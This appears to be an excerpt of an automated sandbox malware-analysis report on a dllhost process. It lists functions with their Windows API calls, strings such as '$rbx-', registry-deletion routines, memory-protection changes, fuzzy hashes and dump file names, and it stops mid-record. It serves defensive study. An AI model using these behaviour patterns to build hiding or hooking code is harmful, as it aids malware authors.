Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 391cf704cb4f92ff4a1b505e12524511f344734a0e05ad07313651760439eb3d
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 2E317035212680A5EE11DB16DA00BED2396BBC9BA0F5D463DFD1D47792FF38C4868710

Function 000001EF09429AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001EF09429C6B,?,?,?,000001EF0942945C,?,?,?,?,000001EF09428F65), ref: 000001EF09429B31
GetLastError.KERNEL32(?,?,?,000001EF09429C6B,?,?,?,000001EF0942945C,?,?,?,?,000001EF09428F65), ref: 000001EF09429B3F
LoadLibraryExW.KERNEL32(?,?,?,000001EF09429C6B,?,?,?,000001EF0942945C,?,?,?,?,000001EF09428F65), ref: 000001EF09429B69
FreeLibrary.KERNEL32(?,?,?,000001EF09429C6B,?,?,?,000001EF0942945C,?,?,?,?,000001EF09428F65), ref: 000001EF09429BD7
GetProcAddress.KERNEL32(?,?,?,000001EF09429C6B,?,?,?,000001EF0942945C,?,?,?,?,000001EF09428F65), ref: 000001EF09429BE3

Strings

api-ms-, xrefs: 000001EF09429B51

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: a66865d9eaf0d5adb56efc8362a4dcb383f851798a24c0a88ea7806b2b1838dd
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 6331AD392126C091EE119B12EA007ED2796BB89BB4F9DC63CBD1D4B792FF39C4468310

Function 000001EF09233400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001EF09233431
GetLastError.KERNEL32 ref: 000001EF0923343D
CloseHandle.KERNEL32 ref: 000001EF09233455
CreateFileW.KERNEL32 ref: 000001EF09233480
WriteConsoleW.KERNEL32 ref: 000001EF0923349F

Strings

CONOUT$, xrefs: 000001EF09233461

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 0c2e37dbc164343603d4ad7d5205c891ae89f708deb9fd064a44ac374ad0aec7
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: D8119031310B8082E7508B52EA5475D67A2F3C8BE4F48823CFE5E87B96EF39C5058740

Function 000001EF09433400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001EF09433431
GetLastError.KERNEL32 ref: 000001EF0943343D
CloseHandle.KERNEL32 ref: 000001EF09433455
CreateFileW.KERNEL32 ref: 000001EF09433480
WriteConsoleW.KERNEL32 ref: 000001EF0943349F

Strings

CONOUT$, xrefs: 000001EF09433461

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 5dcfdee2eeb787bdf2f821f10ceee9ccb17ba2142b2a9ad0797cc2fda66b9c87
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: FD114F35210AC086E7508B62E95475D67B1F7D8BF4F48C22CFE5D87B96EB39C4158740

Function 00000001400017A8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00000001400017DC
RegDeleteKeyW.ADVAPI32 ref: 00000001400017ED
RegEnumKeyExW.ADVAPI32 ref: 000000014000182A
RegCloseKey.ADVAPI32 ref: 000000014000183B
RegDeleteKeyExW.ADVAPI32 ref: 0000000140001858

Strings

SOFTWARE\$rbx-config, xrefs: 00000001400017CE, 0000000140001844

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\$rbx-config
API String ID: 3013565938-3990243012
Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19

Function 000001EF09226270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001EF092262AB
GetThreadContext.KERNEL32 ref: 000001EF09226415

Part of subcall function 000001EF092260A0: GetCurrentThreadId.KERNEL32 ref: 000001EF092260A4

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 36ea7d26e62ca28bfa3b4e3a46fbd43fabea14f5e691a71912b48576972982ad
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: A3D17B76209B8895DB709B1AE49439E77A1F3C8B88F14012AFE8D477A6DF3CC552CB04

Function 000001EF09426270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001EF094262AB
GetThreadContext.KERNEL32 ref: 000001EF09426415

Part of subcall function 000001EF094260A0: GetCurrentThreadId.KERNEL32 ref: 000001EF094260A4

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 3f6e4745aea0a7298c787884e47ede39e99b191d0718cbd86084dad7f098a0f6
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 24D19D3A204BC881DB709B1AE49439E77A1F3C8B98F55812AEECD4776ADF39C551CB04

Function 000001EF09222098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001EF092220A6
TlsFree.KERNEL32 ref: 000001EF0922225F
TlsFree.KERNEL32 ref: 000001EF0922226B
TlsFree.KERNEL32 ref: 000001EF09222277
TlsFree.KERNEL32 ref: 000001EF09222283
TlsFree.KERNEL32 ref: 000001EF0922228F

Part of subcall function 000001EF09225E50: GetCurrentThreadId.KERNEL32 ref: 000001EF09225E66

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: b4164104759a42f68289d27f34dc3bf055787bdff0abd420a5afdce33fff53c5
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 3451BF31251B85A5EB09DF24E8916EC33A2BB94744F88493DBD2C067A7FF79C56AC340

Function 000001EF09422098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001EF094220A6
TlsFree.KERNEL32 ref: 000001EF0942225F
TlsFree.KERNEL32 ref: 000001EF0942226B
TlsFree.KERNEL32 ref: 000001EF09422277
TlsFree.KERNEL32 ref: 000001EF09422283
TlsFree.KERNEL32 ref: 000001EF0942228F

Part of subcall function 000001EF09425E50: GetCurrentThreadId.KERNEL32 ref: 000001EF09425E66

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: d1be2e71105d053f263df4cab093ee997b37e52b00728c541e73c3e9f25ed74e
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: E451A939241BC595EF099B24E8913EC23A2BB94764F88C83DBD2D067AAFF75C556C340

Function 000001EF092235C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001EF092224D1), ref: 000001EF092235EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001EF092224D1), ref: 000001EF092235FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001EF092224D1), ref: 000001EF09223673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001EF092224D1), ref: 000001EF092236D9
HeapFree.KERNEL32(?,?,?,?,?,000001EF092224D1), ref: 000001EF092236E7

Strings

$rbx-, xrefs: 000001EF0922366C

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: ddbc2742e404b957ea05f48161f8edb77ec29f91fc8d74d70efd434fa568c4d6
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 01317E32701B95A2EA19DF16E5447AD63A6FBC4F84F0C8038AF4807B56FF38C4A28704

Function 000001EF094235C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001EF094224D1), ref: 000001EF094235EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001EF094224D1), ref: 000001EF094235FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001EF094224D1), ref: 000001EF09423673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001EF094224D1), ref: 000001EF094236D9
HeapFree.KERNEL32(?,?,?,?,?,000001EF094224D1), ref: 000001EF094236E7

Strings

$rbx-, xrefs: 000001EF0942366C

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 01a3c1abdc2e49f5cd3fdfd359a2ccc5d5754d5c7e6d7a02f4153c05a9d3b987
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 60315F39701BD582EA29DF26D5447AD63A6FB84FA4F4CC038AE4847B56FF39D4628700

Function 000001EF0922C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001EF0922C94F
SetLastError.KERNEL32 ref: 000001EF0922C96E
FlsSetValue.KERNEL32 ref: 000001EF0922C997
FlsSetValue.KERNEL32 ref: 000001EF0922C9A8
FlsSetValue.KERNEL32 ref: 000001EF0922C9B9

Part of subcall function 000001EF0922D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001EF0922674A), ref: 000001EF0922D2B6
Part of subcall function 000001EF0922D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001EF0922674A), ref: 000001EF0922D2C0

SetLastError.KERNEL32 ref: 000001EF0922C9DC

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 4dd8126c2e70f880a2b585176c5349ae72a0b7e4dc446a29065a6f39018c9abd
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 89114F312052C062FA14A731E9157FE1353ABCA790F9C567CBDAA567CBFE28C4434300

Function 000001EF0942C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001EF0942C94F
SetLastError.KERNEL32 ref: 000001EF0942C96E
FlsSetValue.KERNEL32 ref: 000001EF0942C997
FlsSetValue.KERNEL32 ref: 000001EF0942C9A8
FlsSetValue.KERNEL32 ref: 000001EF0942C9B9

Part of subcall function 000001EF0942D2A0: RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,000001EF0942674A), ref: 000001EF0942D2B6
Part of subcall function 000001EF0942D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001EF0942674A), ref: 000001EF0942D2C0

SetLastError.KERNEL32 ref: 000001EF0942C9DC

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 729d51382afc7c4b3148ce236d959bf3ff1e33c43ade759b8ead48446a09950c
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 841119396042C042FA146B31E9553EE1253BBCA7B4FDCC67CBD6A562CBFE2AC4034210

Function 000001EF09221A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001EF09221A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001EF09221A74
PathFindFileNameW.SHLWAPI ref: 000001EF09221A83
lstrlenW.KERNEL32 ref: 000001EF09221A8F
StrCpyW.SHLWAPI ref: 000001EF09221AA2
CloseHandle.KERNEL32 ref: 000001EF09221AB0

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: d60d2c758e915a4d11e5d10860bba4ce38f944ba3807c6f941f63b3eded7de0d
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 15011B31715A8096EA14DB12E998B9D63A2F7C8FC0F488079AE9D43756EE3DC586C780

Function 000001EF09421A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001EF09421A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001EF09421A74
PathFindFileNameW.SHLWAPI ref: 000001EF09421A83
lstrlenW.KERNEL32 ref: 000001EF09421A8F
StrCpyW.SHLWAPI ref: 000001EF09421AA2
CloseHandle.KERNEL32 ref: 000001EF09421AB0

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: d39c3802367eb970469d42e78d0c76f3521270f2e661142744d57cef258e7400
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: A7011E35704AC086EA14DB22E55479D63A2F7C8FE4F88C139AE5D43755EE3DC546C780

Function 000001EF09223E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001EF09223AAC), ref: 000001EF09223E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001EF09223AAC), ref: 000001EF09223E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001EF09223AAC), ref: 000001EF09223E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001EF09223AAC), ref: 000001EF09223E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001EF09223AAC), ref: 000001EF09223E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001EF09223AAC), ref: 000001EF09223EAE

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: fe1bf7927918a225e3104fa881a18ebe12aecd470c7aeb99e1e6b8871aeb2c60
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 81011B75212B8092EB249B21E88879D73A2BB99B45F08403CFD4D06366FF3EC05AC700

Function 000001EF09423E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001EF09423AAC), ref: 000001EF09423E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001EF09423AAC), ref: 000001EF09423E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001EF09423AAC), ref: 000001EF09423E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001EF09423AAC), ref: 000001EF09423E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001EF09423AAC), ref: 000001EF09423E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001EF09423AAC), ref: 000001EF09423EAE

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
